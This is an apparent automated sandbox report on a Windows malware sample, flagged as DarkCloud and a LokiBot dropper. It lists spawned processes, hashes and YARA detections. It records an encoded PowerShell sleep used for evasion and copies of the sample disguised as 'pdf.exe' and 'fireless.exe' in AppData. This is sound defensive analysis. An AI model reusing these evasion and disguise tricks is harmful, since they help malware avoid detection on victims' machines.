                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Target ID:1
                                                                  Start time:08:00:01
                                                                  Start date:23/09/2022
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                                                                  Imagebase:0x160000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  Target ID:2
                                                                  Start time:08:00:02
                                                                  Start date:23/09/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6da640000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:12
                                                                  Start time:08:01:10
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
                                                                  Imagebase:0x6d0000
                                                                  File size:23040 bytes
                                                                  MD5 hash:386FB639720C77FC29E68682D264423F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  Reputation:low

                                                                  Target ID:13
                                                                  Start time:08:01:12
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Imagebase:0xa80000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Visual Basic
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Target ID:17
                                                                  Start time:08:01:24
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\AppData\Roaming\note\pdf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\note\pdf.exe"
                                                                  Imagebase:0xed0000
                                                                  File size:23552 bytes
                                                                  MD5 hash:4FF4A281A08A0681597794A3024FB584
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  Reputation:low

Target ID:20
Start time:08:01:35
Start date:23/09/2022
Path:C:\Users\user\AppData\Roaming\note\pdf.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\note\pdf.exe"
Imagebase:0x600000
File size:23552 bytes
MD5 hash:4FF4A281A08A0681597794A3024FB584
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low

Target ID:21
Start time:08:01:40
Start date:23/09/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Imagebase:0x1230000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

Target ID:22
Start time:08:01:50
Start date:23/09/2022
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"
Imagebase:0xf60000
File size:23552 bytes
MD5 hash:4FF4A281A08A0681597794A3024FB584
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation:low

No disassembly